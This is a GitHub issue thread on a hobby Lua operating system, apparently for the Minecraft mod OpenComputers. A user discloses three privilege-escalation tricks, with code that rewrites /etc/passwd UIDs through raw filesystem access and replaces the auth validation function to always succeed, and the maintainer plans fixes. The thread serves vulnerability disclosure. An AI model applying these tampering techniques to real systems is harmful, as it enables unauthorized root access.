search

Shuudoushi / SecureOS

The official operating system of OpenSecurity.
24 stars 8 forks source link

How to hack SecureOS... #42

Closed mpmxyz closed 9 years ago

mpmxyz commented 9 years ago

Hello there, I know that 100% security probably isn't your goal but here are some examples how you can modify /etc/passwd to get su rights: variant 1: use direct component access to modify the file

local component = require("component")
for address in pairs(component.list("filesystem")) do
  local fs = component.proxy(address)
  if fs.exists("/etc/passwd") then
    local handle = fs.open("/etc/passwd")
    local content = fs.read(handle, 1024) --quick and dirty: has obvious problems with larger files
    fs.close(handle)
    content = content:gsub(":0", ":1") --quick and dirty: also changes your password with a probability of 1/16
    handle = fs.open("/etc/passwd","w")
    fs.write(handle, content)
    fs.close(handle)
  end
end

variant 2: modify auth library step 1

local auth = require("auth")
function auth.validate(username, password)
  --TODO: insert password logger here
  return true, true --unlimitted power!
end

step 2: sudo edit /etc/passwd

variant 3: my favorite

  1. edit /tmp/.root, type something, Ctrl + S, Ctrl + W
  2. edit /etc/passwd
  3. ???
  4. profit
Shuudoushi commented 9 years ago

Yeah... the /tmp/.root thing is meant to be a temp thing till I find a better way of handling it... More than likely going to use a keygen system, like onetime passwords.

Shuudoushi commented 9 years ago

There is another issue with what you have here, it requires you to already be in the system, thus most - if not all - security can be bypassed in one way or another, even in real *nix systems, though not as easily.

BTW, which branch did you find these vulnerabilities in? Some of these, if not all, may not work in the latest dev build. If you'll be so kind as to let me know if these workarounds work in the dev build as well, it'll be a great help. Thank you.

mpmxyz commented 9 years ago

I used the current master branch installer but all three attacks work with the current dev branch. (btw.: Nice updating system! Changing to the dev branch was very easy.)

Shuudoushi commented 9 years ago

It's not quite that nice of an update system >.> It has no version check, so it just overrides all files on the list... Still need to get a version check system going... But it is nice to hear that it's as easy to use as I hoped :P

As far as the issues at hand goes, I'll start looking into ways of defeating them when I have time to work on SOS again. Thank you again for bringing this information to my attention.

Shuudoushi commented 9 years ago

Still have things that need to be cleaned up and added before I merge to the release branch, but do let me know if everything is working as it should. (BTW, sudo update -a dev will make it so you will always pull updates from the dev branch when you run sudo update, just incase you didn't know already :P)